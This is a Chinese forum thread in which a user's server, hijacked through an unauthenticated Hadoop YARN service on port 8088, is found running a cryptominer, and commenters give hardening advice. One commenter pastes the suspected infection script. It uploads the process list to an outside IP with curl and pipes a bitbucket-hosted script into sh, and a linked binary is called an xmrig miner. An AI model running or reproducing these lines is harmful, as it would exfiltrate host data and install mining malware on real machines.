攻击别人服务器是怎么搞的啊

cpu 百分百？那估计是挖矿脚本

估计你在 8088 端口启的服务有漏洞

#!/bin/bash

ps ax --sort=-pcpu > /tmp/tmp2.txt
#netstat -antp > /tmp/tmp2.txt
#crontab -l > /tmp/tmp2.txt
#ps -eo uid,pid,ppid,stime,%cpu,cmd --sort=-%cpu |grep -v STIME| head>/tmp/tmp2.txt
#top -c -n 1 -b > /tmp/tmp.txt
curl -F "file=@/tmp/tmp2.txt" http://46.249.38.186/rep.php
rm -rf /tmp/tmp2.txt

LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi

if [ ! "$(ps -fe|grep '/tmp/java'|grep 'w.conf'|grep -v grep)" ];
then
$LDR https://bitbucket.org/okjh6t37/mygit/raw/master/zz.sh | sh
else
pwd
fi


这可能是那个脚本

@WordTian 你好 请问有办法限制 ip 吗？ 我搞了一会搞不好 直接关了 8088 我这边好多也不方便了

以前没在意过这些 安全组都是直接地址段访问然后 0.0.0.0/0
这会有点难受了

你是要跑什么东西？还是去好好补补安全常识吧，直接 0.0.0.0/0 也是心大。

有漏洞就抓紧补上。留着漏洞，只限 IP，这是什么操作？

哈哈，这点性能也要搞我

两年多前我遇到这种情况是因为 redis 没密码，看看有什么漏洞

https://bitbucket.org/okjh6t37/mygit/raw/master/x_64
这个是实际执行的二进制文件，看着像门罗币的挖矿病毒 xmrig

我之前开 aria2c 没设密钥的时候也中过一回类似的东西，你还是排查下对外开启的服务吧，看看有哪个可能有漏洞的，话说你 8088 开的什么服务啊

限制 ip 的话，你先看看安全组有没相关的设置吧，有的话用那个就行。
如果有经验的话，可以用 iptables。不行的话用 /etc 下的 host.allow，host.deny 也可以试试

@WordTian 8088 跑着一个 yarn 我刚才查到是 nodemanager 的漏洞 最开始好像是个俄罗斯黑客发现并利用的漏洞， 目前还在继续找解决办法

@watzds 确实好像是一个服务有漏洞

iptables 或者 firewall 屏蔽不得行？

看着的确是挖矿的

Hadoop yarn 吧，这个应该是未添加认证，可以直接执行的，加个口令或者限制在内网。

一般都是脚本刷漏洞的…别人也不是专门入侵你一个…

曾经我每次 ssh 登陆上，好几千的失败登陆。后来我改了端口号，清净了

@choice4 不是对外公有服务，那就 ssh is 端口外都关闭，需要访问其它服务，装平装 openvpn，或者 ssh 端口映射到本地。

@likuku 就是说 不管这些人是通过什么方式入侵 最后都是通过 ssh 吗 ssh 端口我倒是没改 只是禁了 root 和密码登录， 我搜索到的是说我 8088 跑的东西有一些安全机制的问题 ，后台的版本修复了 。但是我用的那个版本较低，还是有这个漏洞的。 老哥我已经好几个问题看见你帮我了 /笑哭 多谢多谢

@choice4 ssh 端口无所谓，只允许 key 认证 + 禁止 root 登陆就行了（个人观点)，#18 我意思是 ss 之外其它端口干脆都禁掉，需要用的话，利用 openvpn (当然要仅对允许的访客 IP 开端口，当然要使用证书连接)，或者 ssh 端口映射本地。

另外，系统已经被爆(橘)，受到污染的情况下，最好是备份好数据和能信任的干净配置信息前提下，干掉系统重装+更新+防火期 了事。

@Greenm 是 yarn 加个口令是什么操作命令行还是配置文件。我搜到一个关于这个的配置文件 不过 property 里面好像有些变量 在对号

@likuku 好